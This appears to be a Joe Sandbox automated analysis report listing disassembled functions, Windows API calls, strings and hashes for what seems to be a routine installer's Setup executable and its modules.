                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prolog3LastPathRootStrip
                                                                                              • String ID: Failed to record SystemMemory
                                                                                              • API String ID: 1831876552-335854511
                                                                                              • Opcode ID: 5ddb44ec142fe5934dbe288ca7d194683411a0f831b9faf469f7e165439a4073
                                                                                              • Instruction ID: 07688e7fa373c0a73d2a346b377d8cbc0eb7a406570023f53e39568780420d9a
                                                                                              • Opcode Fuzzy Hash: 5ddb44ec142fe5934dbe288ca7d194683411a0f831b9faf469f7e165439a4073
                                                                                              • Instruction Fuzzy Hash: 3C31B371A1021A9BCB04DFB4CD499EEBB79BF25318F110658E514E7B90CB34D909DBA0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F7CA5
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8C391D: __EH_prolog3.LIBCMT ref: 6C8C3924
                                                                                                • Part of subcall function 6C8C395E: __EH_prolog3.LIBCMT ref: 6C8C3965
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Package Name = %s$Package Version = %s$Package details
                                                                                              • API String ID: 431132790-2412997842
                                                                                              • Opcode ID: 2bd87f53008b3e0f93ac5ebce17468dd7124cbb3c212bdf624132e286f25f002
                                                                                              • Instruction ID: 6c049c4e29ba3f153cefc59900da6d6b61da95782ec70bfe179cff96c4c8a29c
                                                                                              • Opcode Fuzzy Hash: 2bd87f53008b3e0f93ac5ebce17468dd7124cbb3c212bdf624132e286f25f002
                                                                                              • Instruction Fuzzy Hash: 0231AE7190414DEFCF10CBA8C945BEDBBB5AF25308F144554E110BBB90C774EA19DBA5
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C7132
                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,00000010), ref: 6C8C7191
                                                                                              • #195.MSI(00000010,00000000,00000104,00000000,00000000,00000104,00000010,MSI.dll), ref: 6C8C7200
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: #195FolderH_prolog3Path
                                                                                              • String ID: MSI.dll
                                                                                              • API String ID: 2462876523-3845536143
                                                                                              • Opcode ID: b0511c1c73548a44b223eb3c0e5f4e413607314e0834cd16f438b7871ef7925c
                                                                                              • Instruction ID: 8e7bc0b584e9036366507451649eb371e0e527f307e64ef5e237c9b9c63a943c
                                                                                              • Opcode Fuzzy Hash: b0511c1c73548a44b223eb3c0e5f4e413607314e0834cd16f438b7871ef7925c
                                                                                              • Instruction Fuzzy Hash: DA31AF70A10209DFDF04DFA8C889AFEBBB5BF24318F154559E410ABB80C774DA09DBA4
                                                                                              APIs
                                                                                                • Part of subcall function 6C8F76A7: __EH_prolog3.LIBCMT ref: 6C8F76AE
                                                                                                • Part of subcall function 6C8F76A7: GetModuleHandleW.KERNEL32(kernel32.dll,00000020,6C8FF845,?), ref: 6C8F7748
                                                                                                • Part of subcall function 6C8F76A7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 6C8F7758
                                                                                                • Part of subcall function 6C8F76A7: SetThreadStackGuarantee.KERNEL32(00020000), ref: 6C8F776D
                                                                                                • Part of subcall function 6C8F76A7: SetUnhandledExceptionFilter.KERNEL32(6C90416A), ref: 6C8F7774
                                                                                                • Part of subcall function 6C8F76A7: GetCommandLineW.KERNEL32 ref: 6C8F777A
                                                                                              • _memset.LIBCMT ref: 6C8FF85B
                                                                                              • GetEnvironmentVariableW.KERNEL32(DebugIronMan,?,000000FF,?,?,?), ref: 6C8FF874
                                                                                              • DebugBreak.KERNEL32(?,?,?), ref: 6C8FF8B8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressBreakCommandDebugEnvironmentExceptionFilterGuaranteeH_prolog3HandleLineModuleProcStackThreadUnhandledVariable_memset
                                                                                              • String ID: DebugIronMan
                                                                                              • API String ID: 12115070-628588297
                                                                                              • Opcode ID: 284e52822a8ddb406e0fb8edeff3c3a97228731d5a314e4cbd7d1e9b7a3f9351
                                                                                              • Instruction ID: 8ae5b75183a639556ca535465ad41cdae1f353a2511652864626f0d6cfe7efa5
                                                                                              • Opcode Fuzzy Hash: 284e52822a8ddb406e0fb8edeff3c3a97228731d5a314e4cbd7d1e9b7a3f9351
                                                                                              • Instruction Fuzzy Hash: 9811087161021EAAE720EF748A09ADBB3F4EF14758F404964D525D7B41F730DA46C740
                                                                                              APIs
                                                                                              • GetTokenInformation.KERNELBASE(?,/3]l,00000000,00000000,00000000,00000000,00000000,?,?,6C5D36C7,?,00000001), ref: 6C5D2835
                                                                                              • GetLastError.KERNEL32(?,?,6C5D36C7,?,00000001,?,?,?,?,6C5D332F,?), ref: 6C5D283B
                                                                                                • Part of subcall function 6C5D1967: malloc.MSVCRT(?,6C5F0554), ref: 6C5D1979
                                                                                              • GetTokenInformation.KERNELBASE(?,?,00000000,?,?,?,?,6C5D36C7,?,00000001,?,?,?,?,6C5D332F,?), ref: 6C5D2863
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: InformationToken$ErrorLastmalloc
                                                                                              • String ID: /3]l
                                                                                              • API String ID: 3066823155-3022599639
                                                                                              • Opcode ID: 3f30c1d183c8c34c7afc358f55d2860901d5b358a527f229fea13f076ce6c0d4
                                                                                              • Instruction ID: a1ccc9fdee657480bc4d46c00b7d7f3c3b8e01598af8d4ce696c2ac89089dd35
                                                                                              • Opcode Fuzzy Hash: 3f30c1d183c8c34c7afc358f55d2860901d5b358a527f229fea13f076ce6c0d4
                                                                                              • Instruction Fuzzy Hash: D801AD32601309FAEF009AA98C44F9E7B68EB053A9F214021F900B2450D731FE44A768
                                                                                              APIs
                                                                                              • MapDialogRect.USER32(?,00000000), ref: 63960EC4
                                                                                                • Part of subcall function 639691B7: _malloc.LIBCMT ref: 639691D1
                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 63960F1D
                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 63960F27
                                                                                              • ShowWindow.USER32(?,00000001,?,00000000,?,00000000), ref: 63960F2E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$DialogRectShowWindow_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 929715566-0
                                                                                              • Opcode ID: f5024eadc1f6f761cdba2dbc2135efcb1b0d4016129ab17a16a61073108b770c
                                                                                              • Instruction ID: 0d7de4c62c8a87d3d48e72a2395a43ae96137363862fb53015b1183e517ea210
                                                                                              • Opcode Fuzzy Hash: f5024eadc1f6f761cdba2dbc2135efcb1b0d4016129ab17a16a61073108b770c
                                                                                              • Instruction Fuzzy Hash: A7316935A00219AFDB159F68C889AAEBFF5FF89750F104019F605EB3A0DB759901CF91
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5D3D28
                                                                                                • Part of subcall function 6C5D182C: RegOpenKeyExW.KERNEL32(?,?,00000000,-00020018,6C5D2E5E,?,?,00000000,?,?,?,6C5D2E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C5D1897
                                                                                                • Part of subcall function 6C5D182C: RegQueryValueExW.KERNEL32(6C5D2E5E,?,00000000,00000027,80000002,?,?,00000000,?,?,?,6C5D2E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C5D18B3
                                                                                                • Part of subcall function 6C5D182C: RegCloseKey.KERNEL32(6C5D2E5E,?,00000000,?,?,?,6C5D2E5E,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 6C5D18D1
                                                                                              • SetLastError.KERNEL32(00000000,80000001,Software\Microsoft\SQMClient,UserId,?,00000027), ref: 6C5D3D74
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseErrorLastOpenQueryValuememset
                                                                                              • String ID: Software\Microsoft\SQMClient$UserId
                                                                                              • API String ID: 895213837-3032788761
                                                                                              • Opcode ID: 63ad1620175bec44a50607252ace21114a49d6491865a1716d617bd414b08ca0
                                                                                              • Instruction ID: 397ea1476cb378f4787c2d273b0af6f61c4f488a6dbd51e7ad75071268d31115
                                                                                              • Opcode Fuzzy Hash: 63ad1620175bec44a50607252ace21114a49d6491865a1716d617bd414b08ca0
                                                                                              • Instruction Fuzzy Hash: 1D210575201344AADB00EF98DC84E9F7BB9AB85388F560425E5129B951C3B1ED488B8C
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5D2E34
                                                                                                • Part of subcall function 6C5D182C: RegOpenKeyExW.KERNEL32(?,?,00000000,-00020018,6C5D2E5E,?,?,00000000,?,?,?,6C5D2E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C5D1897
                                                                                                • Part of subcall function 6C5D182C: RegQueryValueExW.KERNEL32(6C5D2E5E,?,00000000,00000027,80000002,?,?,00000000,?,?,?,6C5D2E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C5D18B3
                                                                                                • Part of subcall function 6C5D182C: RegCloseKey.KERNEL32(6C5D2E5E,?,00000000,?,?,?,6C5D2E5E,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 6C5D18D1
                                                                                              • SetLastError.KERNEL32(00000000,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 6C5D2E80
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseErrorLastOpenQueryValuememset
                                                                                              • String ID: MachineId$Software\Microsoft\SQMClient
                                                                                              • API String ID: 895213837-1718750536
                                                                                              • Opcode ID: f3de60e408485a4b1d377901b59e24fe0e95dcdd8f8145a77e68e713e1cc8ec8
                                                                                              • Instruction ID: 2a1824bd7d7ad0392df684a13ae2fe4ace265eeca136a805e20c3e6e8dbb967b
                                                                                              • Opcode Fuzzy Hash: f3de60e408485a4b1d377901b59e24fe0e95dcdd8f8145a77e68e713e1cc8ec8
                                                                                              • Instruction Fuzzy Hash: C4210831200344ABD700DE9C9CC4FAFB7A9EB85348F570429E515DB951C7B1ED888B99
                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 6396D771
                                                                                                • Part of subcall function 63968FCB: __FF_MSGBANNER.LIBCMT ref: 63968FE4
                                                                                                • Part of subcall function 63968FCB: __NMSG_WRITE.LIBCMT ref: 63968FEB
                                                                                                • Part of subcall function 63968FCB: HeapAlloc.KERNEL32(00000000,00000001,00000000,?,?,?,639691D6,?), ref: 63969010
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocHeap_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 3293231637-0
                                                                                              • Opcode ID: f95259730f2e1bece1798d84181a20776c0a7f8a0892d4db980c4806e8365ea6
                                                                                              • Instruction ID: 9b87bf95017493f569bd87c2fe5d95138b41cd19cb3ac4f1140366bf6e6ac307
                                                                                              • Opcode Fuzzy Hash: f95259730f2e1bece1798d84181a20776c0a7f8a0892d4db980c4806e8365ea6
                                                                                              • Instruction Fuzzy Hash: AB11987294F315AEFB112B7D981468A3BA8DF57BE4B340525F8689A350EB30C9408ED1
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,6C5D332F,?), ref: 6C5D3683
                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,6C5D332F,?), ref: 6C5D36B3
                                                                                                • Part of subcall function 6C5D2815: GetTokenInformation.KERNELBASE(?,/3]l,00000000,00000000,00000000,00000000,00000000,?,?,6C5D36C7,?,00000001), ref: 6C5D2835
                                                                                                • Part of subcall function 6C5D2815: GetLastError.KERNEL32(?,?,6C5D36C7,?,00000001,?,?,?,?,6C5D332F,?), ref: 6C5D283B
                                                                                                • Part of subcall function 6C5D2815: GetTokenInformation.KERNELBASE(?,?,00000000,?,?,?,?,6C5D36C7,?,00000001,?,?,?,?,6C5D332F,?), ref: 6C5D2863
                                                                                              • ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 6C5D36D5
                                                                                              • CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,6C5D332F,?), ref: 6C5D36E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                              • String ID:
                                                                                              • API String ID: 995526605-0
                                                                                              • Opcode ID: 4111eaacdedf11bdbe9144741265b75b8b70bb3c1e0266a862673884ce9bcdeb
                                                                                              • Instruction ID: e164820ef77e6b872f8746b6155904ba27f1a1c5b0571112042608e3f9d20c9b
                                                                                              • Opcode Fuzzy Hash: 4111eaacdedf11bdbe9144741265b75b8b70bb3c1e0266a862673884ce9bcdeb
                                                                                              • Instruction Fuzzy Hash: 97119D31602354EBDB009F69CC85E9E7BB8EB453E8F224068F410AB650CB71ED50DB58
                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 6C91C0C4
                                                                                                • Part of subcall function 6C91BFB3: __FF_MSGBANNER.LIBCMT ref: 6C91BFCC
                                                                                                • Part of subcall function 6C91BFB3: __NMSG_WRITE.LIBCMT ref: 6C91BFD3
                                                                                                • Part of subcall function 6C91BFB3: RtlAllocateHeap.NTDLL(00000000,00000001,?,6C8F831D,00000000,?,6C91C0C9,6C8FF845,00000C00,00000020,6C8FF845,?), ref: 6C91BFF8
                                                                                              • std::exception::exception.LIBCMT ref: 6C91C0F9
                                                                                              • std::exception::exception.LIBCMT ref: 6C91C113
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C91C124
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 615853336-0
                                                                                              • Opcode ID: 8acfc5912aaf4ff7e28ae540b85b33fb7ce4f42836e51216a94eb7f220260658
                                                                                              • Instruction ID: 601d17cf2ae8c5476cae4c9ca91f65709d99fe911cede1724dbfa69d90424f7e
                                                                                              • Opcode Fuzzy Hash: 8acfc5912aaf4ff7e28ae540b85b33fb7ce4f42836e51216a94eb7f220260658
                                                                                              • Instruction Fuzzy Hash: 84F0287151824DABCF00EF98C942BDD3AB9AB6231CF640055E824D6ED0CB71CF198751
                                                                                              APIs
                                                                                              • GetSystemInfo.KERNEL32(?), ref: 6C8C5562
                                                                                                • Part of subcall function 6C8C4FAC: _memset.LIBCMT ref: 6C8C4FB4
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3InfoSystem_memset
                                                                                              • String ID: %s - %s %s %s$Unknown OS
                                                                                              • API String ID: 3853411852-1218788732
                                                                                              • Opcode ID: dba88714ad2ac0958596af956b4458a067e86bc4897750bd3b3c2ac5c52e070a
                                                                                              • Instruction ID: f91810507fefed2d705fb0cf9e4cdd9c7262b11acd32d5f986a70e2d95193caa
                                                                                              • Opcode Fuzzy Hash: dba88714ad2ac0958596af956b4458a067e86bc4897750bd3b3c2ac5c52e070a
                                                                                              • Instruction Fuzzy Hash: 954160722083459FDB20CF68C841ACBBBE5AF99718F140E1EF49497791DB30E6498B97
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D439E
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8CA5D0: __EH_prolog3.LIBCMT ref: 6C8CA5D7
                                                                                                • Part of subcall function 6C8CA5D0: SysFreeString.OLEAUT32(?), ref: 6C8CA62B
                                                                                                • Part of subcall function 6C8F8863: _wcschr.LIBCMT ref: 6C8F887A
                                                                                                • Part of subcall function 6C8D44EA: __EH_prolog3.LIBCMT ref: 6C8D44F1
                                                                                                • Part of subcall function 6C8D44EA: __CxxThrowException@8.LIBCMT ref: 6C8D45E9
                                                                                                • Part of subcall function 6C8D4613: RegCloseKey.ADVAPI32(?,00000034,00000034,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,6C8D42F8,6C8BA794,02F92298), ref: 6C8D468D
                                                                                                • Part of subcall function 6C8D4613: RegCloseKey.ADVAPI32(?,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,6C8D42F8,6C8BA794,02F92298), ref: 6C8D469E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Close$Exception@8FreeStringThrow_wcschr
                                                                                              • String ID: RegKey$RegValueName
                                                                                              • API String ID: 3842226755-3571311812
                                                                                              • Opcode ID: 219422e14320ed0cdd6ed8bc7c4d9e50b5497c06c72c0e8b153dbf2826f61373
                                                                                              • Instruction ID: fab00c884525f13edf696e09f8765c21b020165744ede492adeeb9fb6adb0e6a
                                                                                              • Opcode Fuzzy Hash: 219422e14320ed0cdd6ed8bc7c4d9e50b5497c06c72c0e8b153dbf2826f61373
                                                                                              • Instruction Fuzzy Hash: F3419F31A0124D9FCB20DFE8CA44ADEB7B5AF54318F140665E024E7780CB74EE09DBA2
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D426C
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8CA63E: __EH_prolog3.LIBCMT ref: 6C8CA645
                                                                                                • Part of subcall function 6C8CA63E: SysFreeString.OLEAUT32(?), ref: 6C8CA69B
                                                                                                • Part of subcall function 6C8D4397: __EH_prolog3.LIBCMT ref: 6C8D439E
                                                                                              • GetUserDefaultUILanguage.KERNEL32(6C8BA794,02F92298), ref: 6C8D4302
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$DefaultFreeLanguageStringUser
                                                                                              • String ID: LCIDHint
                                                                                              • API String ID: 188276182-1583853939
                                                                                              • Opcode ID: 7eb9da7354138fc4b164d0bcb499aee1302ea9ce408cf6f5037516d5d5321466
                                                                                              • Instruction ID: cefc278e6af3706b4ec084436d0cc26a18adc6235416fbcfc5884d2719a6163c
                                                                                              • Opcode Fuzzy Hash: 7eb9da7354138fc4b164d0bcb499aee1302ea9ce408cf6f5037516d5d5321466
                                                                                              • Instruction Fuzzy Hash: 73416271A00209DFDB24CFA8CA84EDE77B5BF84318F254969E465AB790CB31ED05CB61
                                                                                              APIs
                                                                                              • SetThreadLocale.KERNEL32(00000000), ref: 6395E1FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: LocaleThread
                                                                                              • String ID: UiInfo.xml
                                                                                              • API String ID: 635194068-3938134364
                                                                                              • Opcode ID: b48fc81c5273e4e294b1f3e8dccb1c0b7cd7e8039dba30d6889422ceddea99e6
                                                                                              • Instruction ID: 68e7315e9ce397deab9a39d421881449ee4677bcd550a7945ec09ffb3acd731f
                                                                                              • Opcode Fuzzy Hash: b48fc81c5273e4e294b1f3e8dccb1c0b7cd7e8039dba30d6889422ceddea99e6
